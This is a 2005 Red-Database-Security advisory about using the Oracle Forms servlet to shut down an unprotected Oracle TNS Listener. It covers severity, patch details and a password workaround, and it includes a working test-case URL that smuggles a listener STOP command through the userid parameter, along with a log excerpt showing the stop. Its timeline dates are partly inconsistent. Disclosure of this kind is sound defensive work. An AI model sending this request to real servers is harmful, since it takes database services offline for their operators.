Red-Database-Security GmbH is specialized in Oracle Security

Products
Repscan 2.5
Hedgehog Enterprise
Checkpwd (free)

Services
Oracle Audit / Hardening
Security Training
Consulting

Information
Oracle Security Blog
Published AlertsRSS Published Alerts
Upcoming AlertsRSS Published Alerts
Patch Information
Whitepaper
Presentations
Oracle Fact Sheets
Exploits
Tutorials
Videos
Scripts

News & Events
Events
News

Company
Contact
People
Partner
Impressum
Sitemap


Search



Search Red-Database-Security
Shutdown TNS Listener via Oracle Forms Servlet

Name Shutdown TNS Listener via Oracle Forms Servlet
Systems Affected Oracle Forms
Severity Medium Risk
Category Denial of Service
Vendor URL http://www.oracle.com/
Author Alexander Kornbrust (ak at red-database-security.com)
Date 7 October 2005 (V 1.00)


Details
The forms servlet can be used to stop the (unprotected) TNS Listener.

Affected Products
Oracle Forms

Patch Information
This bug is fixed with Critical Patch Update July 2005 (CPU July 2005).
Oracle forgot to inform Red-Database-Security that this bug is fixed with CPU July 2005.

Workaround
Protect the TNS Listener with a password.

Testcase

http://server:8888/forms90/f90servlet?form=test.fmx&userid=SCOTT/TIGER@
(DESCRIPTION=(ADDRESS_LIST=(ADDRESS=(PROTOCOL=TCP)(HOST=server)(PORT=1521)))
(CONNECT_DATA=(COMMAND=STOP)(SERVICE=LISTENER)))
&buffer_records=NO&debug_messages=NO&array=YES&query_only=NO&quiet=NO&RENDER=YES


Excerpt from the listener.log:

28-OCT-2003 14:44:46 * (CONNECT_DATA=(COMMAND=STOP)(SERVICE=LISTENER)
(CID=(PROGRAM=C:\oracle\oradev9i\bin\ifweb90.exe)(HOST=SERVER)(USER=Administrator))) * stop * 0


History
14-feb-2005 Oracle secalert was informed
15-feb-2003 Bug confirmed
18-oct-2005 Oracle published the Critical Patch Update October 2005 (CPU October 2005)
20-oct-2005 Red-Database-Security published this advisory



2005 by Red-Database-Security GmbH - last update 03-nov-2005

Oracle Forms

Oracle Forms, a component of the Oracle Developer Suite, is Oracle's long-established technology to design and build enterprise applications quickly and efficiently.

Oracle remains committed to the development of this technology, and to the ongoing release as a component of the Oracle platform. This continuing commitment to Forms technology enables you to leverage your existing investment by easily upgrading and integrating existing Oracle Forms applications to take advantage of web technologies and service oriented architectures (SOA).